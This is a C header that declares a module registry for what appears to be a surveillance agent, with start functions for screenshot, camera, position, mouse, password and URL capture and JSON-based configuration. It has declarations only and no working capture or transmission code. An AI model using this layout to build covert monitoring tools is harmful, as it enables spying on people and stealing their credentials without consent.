#ifndef _MODULE_H
#define _MODULE_H 1

#include <json.h>

#define MODULE_SCREENSHOT_INDEX 0
#define MODULE_SCREENSHOT modulelist[MODULE_SCREENSHOT_INDEX]
#define MODULE_SCREENSHOT_ENTRY { MODULE_SCREENSHOT_INDEX, MODULE_STOPPED, module_screenshot_start, NULL }
void *module_screenshot_start(void *args);
typedef struct {
   int quality;
} module_screenshot_t;

#define MODULE_DEVICE_INDEX 1
#define MODULE_DEVICE modulelist[MODULE_DEVICE_INDEX]
#define MODULE_DEVICE_ENTRY { MODULE_DEVICE_INDEX, MODULE_STOPPED, module_device_start, NULL }
void *module_device_start(void *args);

#define MODULE_APPLICATION_INDEX 2
#define MODULE_APPLICATION modulelist[MODULE_APPLICATION_INDEX]
#define MODULE_APPLICATION_ENTRY { MODULE_APPLICATION_INDEX, MODULE_STOPPED, module_application_start, NULL }
void *module_application_start(void *args);

#define MODULE_POSITION_INDEX 3
#define MODULE_POSITION modulelist[MODULE_POSITION_INDEX]
#define MODULE_POSITION_ENTRY { MODULE_POSITION_INDEX, MODULE_STOPPED, module_position_start, NULL }
void *module_position_start(void *args);

#define MODULE_CAMERA_INDEX 4
#define MODULE_CAMERA modulelist[MODULE_CAMERA_INDEX]
#define MODULE_CAMERA_ENTRY { MODULE_CAMERA_INDEX, MODULE_STOPPED, module_camera_start, NULL }
void *module_camera_start(void *args);
typedef struct {
   int quality;
} module_camera_t;

#define MODULE_MOUSE_INDEX 5
#define MODULE_MOUSE modulelist[MODULE_MOUSE_INDEX]
#define MODULE_MOUSE_ENTRY { MODULE_MOUSE_INDEX, MODULE_STOPPED, module_mouse_start, NULL }
void *module_mouse_start(void *args);
typedef struct {
   int width;
   int height;
} module_mouse_t;

#define MODULE_PASSWORD_INDEX 6
#define MODULE_PASSWORD modulelist[MODULE_PASSWORD_INDEX]
#define MODULE_PASSWORD_ENTRY { MODULE_PASSWORD_INDEX, MODULE_STOPPED, module_password_start, NULL }
void *module_password_start(void *args);

#define MODULE_URL_INDEX 7
#define MODULE_URL modulelist[MODULE_URL_INDEX]
#define MODULE_URL_ENTRY { MODULE_URL_INDEX, MODULE_STOPPED, module_url_start, NULL }
void *module_url_start(void *args);

#define MODULE_STOPPED  0
#define MODULE_STARTED  1
#define MODULE_STOPPING 2
#define MODULE_STARTING 3

typedef struct {
   int module_id;
   int status;
   void *(*start)(void *);
   void *param;
} module_t;

extern module_t modulelist[];

void parsemodules(json_object *config);
void stopmodule();

#endif /* _MODULE_H */
